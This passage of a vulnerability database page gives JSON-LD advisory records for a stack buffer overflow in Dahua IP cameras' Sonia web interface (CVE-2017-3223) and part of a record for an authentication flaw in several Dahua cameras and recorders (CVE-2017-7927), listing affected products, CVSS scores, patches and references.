an affected application. Failed exploit attempts will likely cause a denial-of-service condition
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201807-0267",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ip camera",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "dh_ipc-ack-themis_eng_p_v2.400.0000.14.r.20170713.bin"
},
{
"model": "ip camera",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.400.0000.14.r.20170713"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "dahua security",
"version": null
},
{
"model": "ip camera",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "security dahua ip camera 2.400.0000.14.r.2017",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "security ip camera 2.400.0000.14.r.2017",
"scope": null,
"trust": 0.3,
"vendor": "dahua",
"version": null
},
{
"model": "security ip camera 2.400.0000.14.r.2017",
"scope": "ne",
"trust": 0.3,
"vendor": "dahua",
"version": null
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#547255"
},
{
"db": "CNVD",
"id": "CNVD-2017-27850"
},
{
"db": "BID",
"id": "99620"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005172"
},
{
"db": "NVD",
"id": "CVE-2017-3223"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ip_camera_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "dh_ipc-ack-themis_eng_p_v2.400.0000.14.r.20170713.bin",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ip_camera:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ip_camera_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.400.0000.14.r.20170713",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ip_camera:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-3223"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ilya Smith and Yury Maryshev.",
"sources": [
{
"db": "BID",
"id": "99620"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1180"
}
],
"trust": 0.9
},
"cve": "CVE-2017-3223",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 10.0,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "COMPLETE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 5.9,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "CVE-2017-3223",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "OFFICIAL FIX",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "MEDIUM",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "IPA",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2017-005172",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-27850",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "IPA",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-005172",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-3223",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-3223",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "IPA",
"id": "JVNDB-2017-005172",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2017-27850",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-1180",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#547255"
},
{
"db": "CNVD",
"id": "CNVD-2017-27850"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005172"
},
{
"db": "NVD",
"id": "CVE-2017-3223"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1180"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua IP camera products using firmware versions prior to V2.400.0000.14.R.20170713 include a version of the Sonia web interface that may be vulnerable to a stack buffer overflow. Dahua IP camera products include an application known as Sonia (/usr/bin/sonia) that provides the web interface and other services for controlling the IP camera remotely. Versions of Sonia included in firmware versions prior to DH_IPC-Consumer-Zi-Themis_Eng_P_V2.408.0000.11.R.20170621 do not validate input data length for the \u0027password\u0027 field of the web interface. A remote, unauthenticated attacker may submit a crafted POST request to the IP camera\u0027s Sonia web interface that may lead to out-of-bounds memory operations and loss of availability or remote code execution. The issue was originally identified by the researcher in firmware version DH_IPC-HX1X2X-Themis_EngSpnFrn_N_V2.400.0000.30.R.20160803. Crafted, sent from a remote third party POST Processing the request can cause a stack-based buffer overflow. The problem is the firmware DH_IPC-HX1X2X-Themis_EngSpnFrn_N_V2.400.0000.30.R.20160803 First identified.Crafted, sent by a remote third party POST Service disruption by processing requests (DoS) An attack may be performed or arbitrary code may be executed on the product. DahuaIPCamera is a webcam from Dahua, China. DahuaIPCamera has a stack buffer overflow vulnerability. An attacker could exploit the vulnerability to execute arbitrary code or cause a denial of service in the context of an affected application. Failed exploit attempts will likely cause a denial-of-service condition",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-3223"
},
{
"db": "CERT/CC",
"id": "VU#547255"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005172"
},
{
"db": "CNVD",
"id": "CNVD-2017-27850"
},
{
"db": "BID",
"id": "99620"
}
],
"trust": 3.15
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-3223",
"trust": 4.1
},
{
"db": "CERT/CC",
"id": "VU#547255",
"trust": 4.1
},
{
"db": "BID",
"id": "99620",
"trust": 2.5
},
{
"db": "JVN",
"id": "JVNVU97102517",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005172",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2017-27850",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1180",
"trust": 0.6
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#547255"
},
{
"db": "CNVD",
"id": "CNVD-2017-27850"
},
{
"db": "BID",
"id": "99620"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005172"
},
{
"db": "NVD",
"id": "CVE-2017-3223"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1180"
}
]
},
"id": "VAR-201807-0267",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-27850"
}
],
"trust": 1.3857143
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-27850"
}
]
},
"last_update_date": "2023-12-18T12:36:43.305000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Download Center Firmware IPC",
"trust": 0.8,
"url": "http://www.dahuasecurity.com/firmware_161.html"
},
{
"title": "DahuaIPcamera Stack Buffer Overflow Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/102594"
},
{
"title": "Dahua IP camera Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=72025"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-27850"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005172"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1180"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.0
},
{
"problemtype": "CWE-121",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005172"
},
{
"db": "NVD",
"id": "CVE-2017-3223"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "https://www.kb.cert.org/vuls/id/547255"
},
{
"trust": 1.9,
"url": "http://www.dahuasecurity.com/firmware_161.html"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/99620"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/121.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-3223"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu97102517/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-3223"
},
{
"trust": 0.3,
"url": "http://www.dahuasecurity.com/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#547255"
},
{
"db": "CNVD",
"id": "CNVD-2017-27850"
},
{
"db": "BID",
"id": "99620"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005172"
},
{
"db": "NVD",
"id": "CVE-2017-3223"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1180"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#547255"
},
{
"db": "CNVD",
"id": "CNVD-2017-27850"
},
{
"db": "BID",
"id": "99620"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005172"
},
{
"db": "NVD",
"id": "CVE-2017-3223"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1180"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-18T00:00:00",
"db": "CERT/CC",
"id": "VU#547255"
},
{
"date": "2017-09-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-27850"
},
{
"date": "2017-07-18T00:00:00",
"db": "BID",
"id": "99620"
},
{
"date": "2017-07-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-005172"
},
{
"date": "2018-07-24T15:29:00.843000",
"db": "NVD",
"id": "CVE-2017-3223"
},
{
"date": "2017-07-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1180"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-26T00:00:00",
"db": "CERT/CC",
"id": "VU#547255"
},
{
"date": "2019-05-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-27850"
},
{
"date": "2017-07-18T00:00:00",
"db": "BID",
"id": "99620"
},
{
"date": "2019-07-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-005172"
},
{
"date": "2019-10-09T23:27:24.947000",
"db": "NVD",
"id": "CVE-2017-3223"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1180"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1180"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua IP cameras Sonia web interface is vulnerable to stack buffer overflow",
"sources": [
{
"db": "CERT/CC",
"id": "VU#547255"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1180"
}
],
"trust": 0.6
}
}
VAR-201705-3744
Vulnerability from variot - Updated: 2023-12-18 12:29plural Dahua The product contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Dahua Technology Authentication is an access control reader produced by Dahua Technology. Dahua Technology Authentication has an authentication vulnerability. An attacker could exploit the vulnerability to gain unauthorized access to restricted content by bypassing expected security restrictions. Dahua DH-IPC-HDBW23A0RN-ZS, etc. are all camera products of Dahua Company in China. A security vulnerability exists in several Dahua products due to the program's use of password hashes instead of passwords to perform authentication. The following products are affected: Dahua DH-IPC-HDBW23A0RN-ZS; DH-IPC-HDBW13A0SN; DH-IPC-HDW1XXX; DH-IPC-HDW2XXX; DH-IPC-HDW4XXX; DH-IPC-HFW4XXX; DH-SD6CXX; DH-NVR1XXX; DH-HCVR4XXX; DH-HCVR5XXX; DHI-HCVR51A04HE-S3; DHI-HCVR51A08HE-S3;
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201705-3744",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dh-ipc-hdbw13a0sn",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hfw2xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hdw1xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hdw4xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hdw2xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hdbw23a0rn-zs",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-nvr1xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hfw1xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-sd6cxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hfw4xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hdbw23a0rn-zs",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hdbw13a0sn",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hdw1xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hdw2xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hdw4xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hfw1xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hfw2xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hfw4xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-sd6cxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-nvr1xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-hcvr4xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-hcvr5xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dhi-hcvr51a04he-s3",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dhi-hcvr51a08he-s3",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dhi-hcvr58a32s-s2",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dhi-hcvr51a08he-s3",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dhi-hcvr51a04he-s3",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-hcvr4xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-hcvr5xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dhi-hcvr58a32s-s2",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dhi-hcvr58a32s-s2",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dhi-hcvr51a08he-s3",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dhi-hcvr51a04he-s3",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-sd6cxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-nvr1xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hfw4xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hfw2xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hfw1xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hdw4xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hdw2xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hdw1xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hdbw23a0rn-zs",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-ipc-hdbw13a0sn",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-hcvr5xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": "dh-hcvr4xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "dahuasecurity",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hdbw23a0rn zs",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh nvr1xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh hcvr4xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh hcvr5xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dhi hcvr51a04he s3",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dhi hcvr51a08he s3",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dhi hcvr58a32s s2",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hdbw13a0sn",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hdw1xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hdw2xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hdw4xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hfw1xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hfw2xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh ipc hfw4xxx",
"version": null
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "dh sd6cxx",
"version": null
}
],
"sources": [
{
"db": "IVD",
"id": "f9954bac-60c9-435b-9538-cebe46db3539"
},
{
"db": "CNVD",
"id": "CNVD-2017-06997"
},
{
"db": "BID",
"id": "98312"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003972"
},
{
"db": "NVD",
"id": "CVE-2017-7927"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1043"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
